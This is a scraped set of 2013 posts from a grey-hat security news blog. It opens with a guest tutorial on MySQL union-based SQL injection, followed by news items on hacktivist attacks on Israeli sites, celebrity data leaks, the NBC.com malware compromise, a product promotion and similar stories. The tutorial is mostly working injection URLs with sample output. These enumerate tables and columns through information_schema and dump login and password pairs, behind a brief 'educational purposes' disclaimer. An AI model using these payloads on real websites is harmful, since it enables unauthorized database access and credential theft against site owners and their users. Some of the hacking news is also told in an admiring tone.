We Are The Best Tool For Web Application Security (Discovering Infamous Sql-i Technique)

We Are The Best Tool For Web Application Security (Discovering The Infamous Sql-injection Technique) 

Today I am proudly sharing an article made by Mr. Rafael Souza one of the great admirer and fan of VOGH has gladly shared his brilliant research paper on SQL-Injection (MySql) with us. Rafael is a very passionate on cyber security domain and he is keenly involved with GreyHat Community and Maintainer design of Brazilian Backtrack Team. So without wasting time lets go and see what Rafael has for us:- 

Discover The Infamous MySQL Injection Technique 

                                                                                        

ABSTRACT:

It is known that computers and software are developed and designed by humans, human error is a reflection of a mental response to a particular activity. Did you know that numerous inventions and discoveries are due to misconceptions?

There are levels of human performance based on the behavior of mental response , explaining in a more comprehensive, we humans tend to err , and due to this reason we are the largest tool to find these errors , even pos software for analysis and farredura vulnerabilities were unimproved by us.

                                                                                                       
Understand the technique MySQL Injection: 

One of the best known techniques of fraud by web developers is the SQL Injection. It is the manipulation of a SQL statement using the variables who make up the parameters received by a server-side script, is a type of security threat that takes advantage of flaws in systems that interact with databases via SQL. SQL injection occurs when the attacker can insert a series of SQL statements within a query (query) by manipulating the input data for an application. 

STEP BY STEP

 

(Figure 1) Detecting

Searching Column number (s): We will test earlier in error, then no error may be said to find.

(Figure 2) SQL Error 

Host Information,

Version of MySQL system used on the server.

(Figure 3) Host Information

(Figure 4) Location of the Files

Current database connection used between the "input" to the MySQL system

(Figure 5) Users of MySQL

(Figure 6) Current Time

Brute Force or Shooting

This happens in versions below 5.x.y

(Figure 7) Testing

Dump: This happens in versions up 5.x.y [ 1º Method ]

http://[site]/query.php?string= 1 union all select 1,2,3,4,group_concat(table_name) from information_schema.tables where table_schema=database()--

usuarios,rafael,fontes,souza,greyhat,hackers,test,ownz,you
or
Unknown column 'usuarios,rafael,fontes,souza,greyhat,hackers,test,ownz,you' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'usuarios,rafael,fontes,souza,greyhat,hackers,test,ownz,you' at line 1

<>------------------------<>-------------------------<>--------------------------<>

[ 2º Method ]

http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(table_name) from information_schema.tables limit 0,1--

CHARACTER_SETS
or
Unknown column 'CHARACTER_SETS' in 'where clause'
ou
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'CHARACTER_SETS' at line 1

=--------------------------=

http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(table_name) from information_schema.tables limit 1,2--

COLLATIONS
or
Unknown column 'COLLATIONS' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'COLLATIONS' at line 1

=--------------------------=

http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(table_name) from information_schema.tables limit 16,17--

usuarios
or
Unknown column 'usuarios' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'usuarios' at line 1

=--------------------------=

http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(table_name) from information_schema.tables limit 17,18--

rafael
or
Unknown column 'rafael' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'rafael' at line 1

----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

Searching Column (s) of a given table

* Brute Force / Shooting

This happens in versions below 5.x.y

http://[site]/query.php?string= 1 union all select 1,2,3,4,nome from usuarios--

Unknown column 'rafael1' in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'rafael1' at line 1

=--------------------------=

http://[site]/query.php?string= 1 union all select 1,2,3,4,churros from usuarios--

Unknown column 'rafael1' in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'rafael1' at line 1

=--------------------------=

http://[site]/query.php?string= 1 union all select 1,2,3,4,login from usuarios--

_Rafa_
or
Unknown column '_Rafa_' in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '_Rafa_' at line 1

=--------------------------=

http://[site]/query.php?string= 1 union all select 1,2,3,4,passwd from usuarios--

rafael1337
or
Unknown column 'rafael1337' in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'rafael1337' at line 1

=--------------------------=--------------------------=--------------------------=--------------------------=

Dump

This happens in versions up 5.x.y [ 1º Method ]

"usuarios" hexadecimal -> "7573756172696f73"

http://[site]/query.php?string= 1 union all select 1,2,3,4,group_concat(column_name) from information_schema.columns where table_name=0x7573756172696f73--

login,passwd,id,texto
or
Unknown column 'login,passwd,id,texto' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'login,passwd,id,texto' at line 1

<>------------------------<>-------------------------<>--------------------------<>

[ 2º Method ]

"usuarios" decimal -> "117,115,117,97,114,105,111,115"

http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(column_name) from information_schema.columns where table_name=char(117,115,117,97,114,105,111,115) limit 0,1--

login
or
Unknown column 'login' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'login' at line 1

=--------------------------=

http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(column_name) from information_schema.columns where table_name=char(117,115,117,97,114,105,111,115) limit 1,2--

passwd
or
Unknown column 'passwd' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'passwd' at line 1

=--------------------------=

http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(column_name) from information_schema.columns where table_name=char(117,115,117,97,114,105,111,115) limit 2,3--

id
or
Unknown column 'id' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'id' at line 1

=--------------------------=

http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(column_name) from information_schema.columns where table_name=char(117,115,117,97,114,105,111,115) limit 3,4--

texto
or
Unknown column 'text' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'text' at line 1

----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

Extracting data from the columns of a given table

http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(login,0x20,0x3a,0x20,senha) from usuarios--

_Rafa_ : fontes1337
or
Unknown column '_Rafa_ : fontes1337' in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '_Rafa_ : fontes1337' at line 1

=--------------------------=

http://[site]/query.php?string= 1 union all select 1,2,3,4,group_concat(login,0x20,0x3a,0x20,senha) from usuarios--

_Rafa_ : fontes1337,l337_ : 3_l33t,greyhats : fontes,hackers : mitnick,green : rha_infosec
or
Unknown column '_Rafa_ : fontes1337,l337_ : 3_l33t,greyhats : fontes,hackers : mitnick,green : rha_infosec ‘in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '_Rafa_ : fontes1337,l337_ : 3_l33t,greyhats : fontes,hackers : mitnick,green : rha_infosec' at line 1

=--------------------------=

http://[site]/query.php?string= 1 union all select 1,2,3,4,concat_ws(0x20,0x3a,0x20,login,senha) from usuarios--

_RHA_ : infosec1337
or
Unknown column '_RHA_ : infosec1337‘ in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '_Mlk_ : gremio1903' at line 1

=--------------------------=

Concat
group_concat() => Search all you want with ascii caracters

concat() => search what you want with ascii caracters

concat_ws() => unite

Hexadecimal
0x3a => :
0x20 => space
0x2d => -
0x2b => +

Readers, this article is for educational purposes only, could continue explaining how to exploit web sites, but that is not my intention.

It is known that the impact of the change may provide unauthorized access to a restricted area, being imperceptible to the eye of an inexperienced developer, it may also allow the deletion of a table, compromising the entire application, among other features. So I want to emphasize that this paper is for security researcher and developers to beware and test your code.

CONCLUSION

Many companies are providing important information on its website and database, information is the most valuable asset is intangible, the question is how developers are dealing with this huge responsibility?

The challenge is to develop increasingly innovative sites, coupled with mechanisms that will provide security to users.

The purpose of this paper is to present what is SQL Injection, how applications are explored and techniques for testing by allowing the developer to customize a system more robust and understand the vulnerability.

**********

I hope you all will enjoy the above article, as I did. On behalf of entire VOGH Team I am sincerely thanking Mr. Rafael Souza for his remarkable contribution. 

To get more of such exclusive research papers along with all kind of breaking cyber updates across the globe just stay tuned with VOGH. 

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">We Are The Best Tool For Web Application Security (Discovering Infamous Sql-i Technique)"https://www.voiceofgreyhat.com/2013/12/we-are-best-tool-for-web-application.html</a>

GFI LanGuard 2012 One Solution For vulnerability Scanning, Patch Management, Network & Software Audit

GFI LanGuard 2012 One Solution For Vulnerability Scanning, Patch Management, Network & Software Auditing 

Earlier we have talked about GFI LanGuard, but while looking at the rising cyber threats, security researcher  continue to identify new, sophisticated malware threats, vulnerability and patch management are more critical than ever as a key component of a layered security approach. To get rid of all those security challenges, GFI Software announced the availability of GFI LanGuard 2012, in which the manufacturer claimed to provide network and system administrators with the ability to manage 100 percent of their patching needs through a single, intuitive and easy-to-use interface, without the need for other update tools. So lets take a roam of this fine product of GFI Software-

Enhanced Features of GFI LanGuard 2012 include:

• Comprehensive Patch Management – Administrators can now manage 100 percent of their patching needs – both security and non-security updates – from a centralized console. No other update tools are necessary.
• Strong Vulnerability Assessment for Network Devices – Network devices such as printers, routers and switches from manufacturers such as HP and Cisco, can now be detected and scanned for vulnerabilities. GFI LanGuard 2012 performs over 50,000 checks against operating systems, installed applications and device firmware for security flaws and misconfigurations. It also runs network audits that now detect mobile devices running iOS and Android operating systems.
• Improved Scan and Remediation Performance – New Relay Agents receive patches and definition files directly from the GFI LanGuard server and distribute as appropriate – helping IT resources save time, manage network bandwidth and increase the number of devices that can be accommodated. This is particularly effective in multi-site and large networks.

GFI LanGuard 2012 combines vulnerability scanning, patch management, and network and software auditing into one solution that enables IT professionals to scan, detect, assess and correct potential security risks on their networks with minimal administrative effort. GFI LanGuard also enables administrators to inventory devices attached to their networks; receive change alerts, such as notification when a new application is installed; ensure antivirus applications are current and enabled; and strengthen compliance with industry regulations through automated patch management that defends against potential network vulnerabilities. With GFI LanGuard, IT administrators can manage more than 2,500 machines from a single console, it integrates with more than 1,500 security applications and includes keyword search functionality.

After going through the above brief description, many of you must be excited about this new product. For the kind information of our readers, yes indeed GFI LanGuard 2012 is one of the finest tool ever released in this domain. Detailed information LanGuard 2012 can be found here. Also a 30 day trail pack of GFI LanGuard 2012 has been made available for download. 

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">GFI LanGuard 2012 One Solution For vulnerability Scanning, Patch Management, Network & Software Audit"https://www.voiceofgreyhat.com/2013/05/GFI-LanGuard-2012-released-for-download.html</a>

#OpIsrael Continues: KHS & MLA Hacked Several Israeli Govt Websites & Leaked Sensitive Data

Muslim Liberation Army (MLA) & Kosova Hacker Security (KHS) Joins Operation Isreal & Hacked Several Israeli Govt Websites & Leaked Sensitive Data

Operation Israel the devastating hacking rampage continues and becoming more and more venturesome for the Israeli cyber space. In the last week of March, it was dangerous hacker collective group Anonymous who called the operation also dubbed #OpIsrael, where the hacker group vows to erase Israel from the Internet. And as expected this is happening, the first quake came from Turkey-based Marxist hacker group named RedHack and Anonymous, where they targeted Israeli intelligence agency Mossad and breached personal data of 35K officials. Operation Israel, was not among those typical rampage of Anonymous, here Anon called other hackers from different part of of the spectrum to join. First it was RedHack who responded, and now the Muslim Liberation Army lead by Pakistani hacker Hitcher, along with Kosova Hacker's Security & few other Albanian hacker's community joined #OpIsrael. 

Yesterday it was Hitcher from Muslim Liberation Army (MLA) who targeted Israel’s Ministry of National Infrastructures (MNI). The hacker managed to breach the server of Israel Ministry and defaced several website belongs to Israel Ministry of Infrastructures. The attack took place at yesterday late night, but still at the time of writing the news, several Israel MNI websites are not performing. Not only MNI, as per sources several other high profile and Israeli government sites have also been taken down in this round attack. While covering this hack of Hitcher, we must have to recap the previous hack of  Pakistan hackers who are constantly against Israel (for Gaza issue) causing massive cyber attack against leading IT industry of Israel and other high profile Israeli sites. Just a couple of months ago, the world seen what it call the black day in the history if Israeli cyber space where another Pak hackers community hacked the main domain controller of Israel, which causes a massive hack against almost all the big Israeli sites such as government, MSN, Bing, Live, Skype, Microsoft Store, BBC, CNN, Coca-Colla, XBOX, Windows, Intel & many more. 

During the hacking rampage, Hitcher delivered the following message - 

“We are outraged at the Palestine present condition and the Illegal occupation of Palestinian Land By the Zionist Israelis. This attack is in response to the Injustice against the Palestinian people. Occupied Palestinian land under the guise of residential settlements are being increased. Palestinians are deprived of their basic human rights. International Aid workers are stopped from providing any humanitarian assistance to the people. The International community and media is not allowed to bring facts to world as due to strict restrictions” 

On the other hand, Kosova Hacker's Security along with few other Albanian hacker's community performed, what it called a demolishing cyber attack, that caused huge damage to the Israeli cyber space. During the attack Kosova Hacker's Security also known as KHS hit several important Israeli government & commercial websites such as  Civil Aviation Authority, Israel Police, Ministry of Health and many more. KHS caused damage to those websites, not by doing defacement by causing data leak. KHS hacked and exposed thousands of sensitive data, including full name, email-id, passwords and other confidential information of those said Israeli websites. All those leaked data have been made available by the hackers in a website called pentagoncrew.com All those hacks have been performed under the banner of Operation Israel also dubbed #OpIsrael for the cause of Gaza. For instance, here we can recap the hack of Kosova Hackers Security (KHS) where they hacked and exposed personal data of 35,000 Israeli people. 

At conclusion, we want to say that, at the time when Anonymous first called Operation Israel, Israeli government presumed that they have taken the threat very seriously and from the government end it has been  stated that they will take almost every steps to avoid any kind of disaster. Now after observing the above scenario it is clear that Israel Government have completely failed to protect their cyber space, in spite of having precaution. Also another thing get spot light, that is different hackers community have already came under a single shade in order to hit Israel against Gaza & Palestine issue. Today is the historical 7th April, I mean the day which Anonymous promised to erase Israel from the Internet. So the clock is running, lets see what more is about to come.  for the time stay tuned with VOGH to get all the latest update on this story and also other cyber issues. 

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">#OpIsrael Continues: KHS & MLA Hacked Several Israeli Govt Websites & Leaked Sensitive Data"https://www.voiceofgreyhat.com/2013/04/OpIsrael-Continues-KHS-MLA-Hacked-Israeli-Sites.html</a>

Angelina Jolie & Lady Gaga Became Victim of Ongoing Celebrity Hacking

Angelina Jolie & Lady Gaga Became Victim of Ongoing Celebrity Hacking 

Now a days it has became a fascination for cyber criminals to target and hack celebrities and public figures. Earlier we have seen similar scenario many a time. Last month an unnamed hacker released personal details of many public figure, national leaders, celebrities. The hacked data dubbed "The Secret Files" by the hackers contains personal information and credit reports (including social security numbers, details of their mortgages, addresses, and details of their credit card and banking details) was made public by those hackers on a website. Now we have past just a couple of weeks, yet again the same massacre took place, the hackers returned to the Internet after a brief hiatus and immediately hit six more. 

Angelina Jolie who played a key role in one of the most fine hacking movie named "Hackers" herself became victim to hackers in real life, as well as Jolie; Lady Gaga, NRA advocate Wayne LaPierre, Dennis Rodman, Michael Vick, Secret Service Director Julia Pierson and Robert De Niro. 

Like earlier, this time also the nature of the hack was similar to the previous the hackers have posted what they claim to be the social security numbers, mortgage amounts, credit card info, car loans, banking and other info for the celebs listed on their site. Last time, the website; where the hacker have posted those hacked credentials; were shutdown by the authorities. But it's now back up and running with a new domain extension (.re) that suggests it's based out of the French island of Réunion located off the coast of Madagascar -said TMZ in an exclusive report. Again also the same style were followed by the hacker group and leaving the very same message saying - "If you believe that God makes miracles, you have to wonder if Satan has a few up his sleeve."

According to sources - Jolie's page (prepared by the hacker) includes what is said to be her social security number as well as her credit report, which can be downloaded. There are addresses listed as well, but they are all business addresses, likely for her lawyer and other people she employs. The same information for Lady Gaga and Johansson is also available. However, Johansson's page also features a photo of her which became public through a previous hacking incident. The FBI has already started investigation, but so far no arrest have been made. In 2011 another high profile hack taken place, where the hacker targeted several celebrities like Scarlett Johansson & few more; while leaking nude photos. Later FBI carried out a special operation named 'Hackerazzi' which put a full stop in that issue and also FBI arrested the master mind named Christopher Chaney was sentenced to imprisonment after pleading guilty. 

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href="> Angelina Jolie & Lady Gaga Became Victim of Ongoing Celebrity Hacking "https://www.voiceofgreyhat.com/2013/04/Angelina-Jolie-Lady-Gaga-Hacked.html</a>

Anonymous Threatens Israel to Erase From The Internet (#OpIsrael)

Anonymous Threatens Israel to Erase From The Internet (#OpIsrael)

Infamous hacker collective group Anonymous along with some organized hacker communities together started a massive rampage against Israeli cyber space. The hacker group threatened Israel government while  planning to engage a massive cyber-attack on Israel, saying that, they will "erase" the country from the Internet. From some legitimate sources it has been confirmed that the hackers are planning to execute the attack on 7th of April. One of the twitter account of Anonymous also confirmed the date and timing, while saying "Hacktivists Starting Cyber Attack against Israel on 7th of April." Also twitter feed of Anonymous invited numerous hackers communities around the world to join up for the cyber rampage dubbed Operation  Israel Phase 2 (#OpIsrael). On the other hand Israel government took the threat seriously and taking almost every steps to avoid any kind of disaster. Ofir Ben Avi, director of online group Accessible Government of Israel told the media -“It’s something being organized online over the past few days. What distinguishes this plan when compared to previous attacks is that it really seems to be organized by Anonymous-affiliated groups from around the world in what looks like a joining of forces”

As you all might know that past experience of Israel while dealing hackers was not at all sweet. In case of Anonymous then we would like to remind you that, this would be the second attack on Israel by the group, as they launched the first “OpIsrael” in November 2012 in response to Israel’s attack on the Gaza Strip.  If you dig the recent past you will come to know that not only Anonymous, but also hackers from different part of the world targeted Israeli cyber space and caused big damages. For instance we can recap the hack of Kosova Hackers Security (KHS) where they hacked and exposed personal data of 35,000 Israeli people. Here we must have to name the hackers from Pakistan who are constantly against Israel causing massive cyber attack against leading IT industry of Israel and other high profile Israeli sites. Just a couple of months ago, the world seen what it call the black day in the history if Israeli cyber space where another Pak hackers community hacked the main domain controller of Israel, which causes a massive hack against almost all the big Israeli sites such as government, MSN, Bing, Live, Skype, Microsoft Store, BBC, CNN, Coca-Colla, XBOX, Windows, Intel & many more. Here we can also take the name of Indian hacker Godzilla & Arabian hacker community (Group-XP) who also harassed and harmed the Israeli cyber space very very badly. After observing all the scenario mentioned above, it is expected to watch some sensational fight between hackers and Israeli government. So lets wait for the time, and stay tuned with VOGH to get all the latest update on this story and also other cyber issues.

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">Anonymous Threatens Israel to Erase From The Internet (#OpIsrael)"https://www.voiceofgreyhat.com/2013/03/OpIsrael-Anonymous-to-Erase-Israel-from-Internet.html</a>

Aaron Swartz Will be Honored With Posthumous 'Freedom of Information' Award

Aaron Swartz Will be Honored With Posthumous 'Freedom of Information' Award 

Well-known Internet activist and Reddit co-founder Aaron Swartz who committed suicide earlier this year causing a havoc temblor in the cyber domain. The reason behind his suicide was mainly disgrace, for which he would face a trail for an alleged cyber crime counts for downloading and publishing roughly 4 million academic journal articles from the database JSTOR. Before the day of his court trial; Swartz, a political activist and computer programmer, reportedly hanged himself last week in his Brooklyn apartment. After this mishap a massive protest came from several part of the world which really arises question against the law and order and the justice system. Along with this, the name of Swartz have been linked with many controversies like being linked with WikiLeaks and so on. What ever, today the entire world of activists will be pleased after hearing that Aaron Swartz is slated to receive posthumous recognition in Washington for his efforts promoting free access to taxpayer-funded research. The James Madison Freedom of Information Award is administered by the American Library Association, and recognizes "individuals who have championed, protected and promoted public access to government information and the public’s right to know national information." The award will be presented by Rep. Zoe Lofgren (D-CA), a strong advocate for digital rights in Congress who rallied in support of Swartz shortly after his suicide in January. Swartz had faced charges under the decades-old Computer Fraud and Abuse Act for downloading a large amount of academic research articles from the JSTOR database at MIT. But despite MIT dropping its own charges, the government pursued a criminal case against Swartz which some evidence suggests was politically motivated and subject to prosecutorial overreach. 

Lofgren, a Democratic congresswoman who represents Silicon Valley, will present the award to his family during a ceremony at Newseum's Knight Conference Center in Washington, D.C. Lofgren, who received the award last year for her efforts to ensure public access to government information, has introduced legislation to reform computer fraud laws linked to his death. The award will be accepted by Swartz's family this Friday at the Newseum in Washington, DC. 

-Source (The Verge & Cnet)

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">Aaron Swartz Will be Honored With Posthumous 'Freedom of Information' Award"https://www.voiceofgreyhat.com/2013/03/AaronSwartz-to-receive-Freedom-of-Information-award.html</a>

Australia Joined 38 Other Nations as Part of an International Cybercrime Treaty

Australia Joined 38 Other Nations as Part of an International Cybercrime Treaty

Sitting at the edge of the latest technology, today we can easily separate our world into two parts. One is the real world where we live and another is the virtual or cyber world, in which we all are tightly attached. As these two fields are the prime factor where we have to stay happily so the matter of safety, security is highly required on the both said areas. Being one of the leading cyber media, our main concern is the cyber domain,  so we are worried as well are responsible and committed to server our readers. In this period of time many of us feel terrified to engage themselves in the cyber space due to lack of security and privacy, and also keeping in mind the major disaster done by cyber criminals. But how long? To get rid of that not only we the media people but also the sincere government of several countries make themselves committed to prepare a safe cyber world for the people. Earlier we have seen several developed countries came under a shade, in order to make an united shield to protect this cyber domain and its people. Today that shield got a new member. Yes it is Australia who has now formally joined 38 other nations as a party to the world's first international treaty on crimes committed via the internet. This deceleration came from the Attorney-General Mark Dreyfus. In his speech he said "Australia becoming a party to the Council of Europe Convention on Cybercrime will help combat criminal offences relating to forgery, fraud, child pornography, and infringement of copyright and intellectual property" 

By joining the Convention, Australian law enforcement agencies will be able to rapidly obtain data about communications relevant to cybercrimes from partner agencies around the world. With the Convention now in effect, Australia's investigative agencies are able to use new powers contained in the Cybercrime Legislation Amendment Act 2012 to work with cybercrime investigators around the globe. The Act amended certain Commonwealth cybercrime offences and enabled domestic agencies to access and share information relating to international investigations. Dreyfus says the Act also created new privacy protections, safeguards and reporting requirements for the exercise of new and existing powers.
"A warrant is always required to access the content of a communication whether the information is in Australia, or accessed from overseas under the Cybercrime Convention. The Cybercrime Act and the Cybercrime Convention do not impact in any way on the need to have a warrant to access content from a telephone call, SMS or e-mail." -Dreyfus said in his statement.

-Source (ZDNet)

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">Australia Joined 38 Other Nations as Part of an International Cybercrime Treaty"https://www.voiceofgreyhat.com/2013/03/Australia-Joined-International-Cybercrime-Treaty.html</a>

NBC.com Compromised, Hackers Exploited The Website to Spread Malware

NBC.com Compromised, Hackers Exploited The Website to Spread Malware

The month of February is still going from bad to worse for the cyber domain, in this very month cyber criminals swallowed the security system of many giant companies like Facebook, Twitter, Apple, New York Times and many more. But the game is not over yet, as we have just passed a few weeks, when the attack on NY Times took place, which stolen the employ database; yet again the cyber criminals have targeted another media giant National Broadcasting Company widely known as NBC. During the attack, hackers have successfully gain access inside the server of NBC and planted malware, in order to harm innocent readers. Famous security expert and blogger Brian Krebs said that the hackers inserted code into the NBC.com homepage. This caused visiting browsers to load pages from third-party sites that were compromised. While explaining the nature of the attacker, Krebs said; "The compromised sites tried to foist the Citadel Trojan, a variant of the Zeus Trojan." The Zeus is a "sophisticated data theft tool that steals passwords and allows attackers to control machines remotely" he added. Not only the NBC’s home page, also several others were affected, including the pages of late night talk show hosts Jay Leno and Jimmy Fallon. Well known security firm Sophos explained how roughly attack played out, and how NBC got sucked into the equation:

• NBC's hacked pages were altered to add some malicious JavaScript that ran in your browser.
• The JavaScript injected an additional HTML component known as an IFRAME (inline frame) into the web page.
• The IFRAME sucked in further malicious content from websites infected with an exploit kit known as RedKit.
• The exploit kit delivered one of two exploit files to try to take control over your browser via a Java vulnerability or a PDF bug.
• If the exploit worked on your computer, financially-related crimeware from the Citadel or ZeroAccess families was installed.

This, of course, is an example of a dreaded drive-by download, where the crooks use a cascade of tricks to download, install and execute software without going through any of the warnings or confirmation dialog you might expect. This, in turn, means that even if you are a careful and well-informed user, you may end up in trouble, since there are no obvious signs that you are doing anything risky, or even unexpected.

As soon as this story get spotted the American commercial broadcasting television network, NBC News reported and confirmed that its site had been attacked. The broadcaster released the following statement regarding the website: "We've identified the problem and are working to resolve it. No user information has been compromised."

The emergency response team immediately take the situation under control and restored the website, and confirmed that the site is back again and completely safe for its visitors. But so far there is no evidence of attackers who were involved in this attack. For the safety of VOGH readers we would like to recommend you to update your operating systems and browser plugins. Also note that the attack on NBC was similar to many that have occurred in recent years in that the malicious sites tried to exploit vulnerabilities in Java. So it will better to disable Java, unless it is that much necessary. So stay tuned with VOGH and be safe in the cyber domain. 

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">NBC.com Compromised, Hackers Exploited The Website to Spread Malware"https://www.voiceofgreyhat.com/2013/02/NBC.com-Compromised.html</a>

'Data Theft' A Serious Issue! Be Watch Full, Be Safe

Hidden Costs of 'Data Theft' A Serious Issue! What You Need to Know to Be Safe 

Sitting at the edge of technology, we the people of this century are blessed with all the required equipment  which makes our work so easy that one could have even imagined three hundred years ago. Along with these positive sides, we must have to keep in mind that, these technologies not only elaborating our effort  making life easier, but also posing  high level of threat. As the main concern of VOGH is cyber domain, so here w would like to share a fact which will make you think and even make your cyber life and your personal life too uncanny. Yes, I am talking about the rising cyber threats; the more we are shedding with technologies, the more we are involving our lives with some dangerous threats and challenges. Now a days cyber criminals are every where, you don't even know, what trap has already been set for you, that can ruin your happy life. One of the big example is "Data Theft" which becoming boomerang for us. In an age of fully digitized data, consumers and businesses can lose thousands of dollars in the blink of a hacker’s eye. The costs of data theft are well known to anyone who has ever found themselves victim to financial identity or medical record fraud. What few of us realize is that the procedures required to right a financial wrong are often costlier than the crimes themselves. Lets share some interesting statistic, which will surely put terror in your mind - the economy loses an average of $22,346 for every time an identity is stolen. And to fully recuperate losses, repair credit and prosecute fraudsters, consumers, accountants, lawyers and IRS officials can spend up to 5,000 hours, the equivalent of two years of full-time work on a single case. Even so, 60% of medical record fraud victims admit that they don’t monitor their medical statements for inconsistencies. 

Shocking!! Why not?

For one, most consumers don’t have time every month to file through complex medical or financial statements and check for accuracy. And secondly, the image of thousands of evil savants working around the clock to hack BOA databases sure makes a consumer feel helpless. Identity theft seems random and unpreventable–a stroke of bad luck like getting struck by lightning. If we are struck, we tell ourselves, banks, credit agencies and insurance companies are legally bound to recover our funds and correct our records. 

Now lets check out a fascinating video in our Hidden Costs Series to get a deeper look at how our high-cost, high-risk data management systems really work.

Hidden Costs of Data Theft (Statistic At a Glance):-

Data theft includes financial identity theft, identity cloning, and medical identity theft. The average cost per victim was $22,346 in 2012. And the total national cost of just medical identity fraud was $41 billion in 2012. The worst part – nearly 60% of reported victims say they don’t ever check their medical records for fraud. Depending on the severity of the case, it can take over 5,000 hours (the equivalent of working a full-time job for two years) to correct the damage.

Since 1935, over 435 million social security cards have been issued. That’s over 2,175 tons of paper issued as cards, or 52,200 trees and 5 million new cards are issued every year. 

Worldwide, digital warehouses storing private information, like banking and personal history, use about 30 billion watts of electricity, which equals roughly the output of 30 nuclear power plants. Data centers in the US make up almost a third of that usage, and waste 90% of the electricity they pull off the grid.

On average, 47% of victims encounter problems qualifying for a new loan and 70% have difficulty removing the negative information from their credit reports.

Over the next five years, the IRS stands to lose as much as $21 billion in revenue due to identity theft, and worldwide, businesses lose close to $221 billion a year with the US, UK, Canada and Australia ranking the highest in reported fraudulent activity.

After reading the above story carefully, many of you will feel insecure and panic. But I would like to inform you that the main purpose of sharing such important information, is to enhance carefulness, to rise cyber awareness. Many people became victim, not because of less knowledge, but of less information, less awareness. So from now onward before connecting your self into the digital world make sure that the significant & the emergent knowledge and information you have gathered from the article, should remain intact inside your brain. Trust me, if you became a bit cautious, you can easily get rid of all those cyber threats, and can enjoy the bless of technologies to make your life prosperous and happy. 

So stay tuned with VOGH and also be canny, be attentive and be safe inside the digital world. 

We the Team VOGH heartily thanks one of our invaluable reader and friend Emily Stewart of Insurance Quotes for the statistic and the awesome video. We love you Emily :) 

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">'Data Theft' A Serious Issue! Be Watch Full, Be Safe"https://www.voiceofgreyhat.com/2013/02/Hidden-Costs-of-Data-Theft.html</a>

Yamaha Motor's Official Website of Six Different Countries Hacked & Defaced

Yamaha Motor's Official Website of Six Different Countries Hacked By Dark Snipper

Yamaha, Japanese multinational corporation; widely known to us for manufacturing motorcycles and power sports equipment, have fallen victim in front of hackers. A newly formed hacker group calling themselves "Dark Snipper" targeted several websites of Yamaha. This round of cyber attack has blown Six Yamaha websites from different countries like Bosnia Herzegovina, Croatia, Montenegro, Macedonia, Slovenia & Serbia. According to sources a few hackers code named 'Soul Inj3ct0r,  P4K-CoMManDeR, Error Haxor,  Dream.Killer, X3o-1337 & SOG' mainly from Pakistan took responsibility of the hack. So far the reason of the attack is not clear, but still the deface page is saying that the attack was inspired by the cause of "Free Palestine". But it is very irrelevant that, why the hacker group targeted Yamaha, as there is hardly any relation between the cause of Gaza, Palestine and Yamaha. What ever! Yamaha authority and the cyber response team immediately recovered those hacked sites by deleting the hacker's page (as shown in the picture below) and patched the security hole.

It is come to our concern that, team 'Dark Snipper' managed to get access into Yamaha server, where all those domain were hosted, and that is why it became possible for the hackers to breach all those Yamaha sites. But, Yamaha did not passed any reaction after the breach. 

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">Yamaha Motor's Official Website of Six Different Countries Hacked & Defaced"https://www.voiceofgreyhat.com/2013/02/Yamaha-Motor-Official-Website-Hacked.html</a>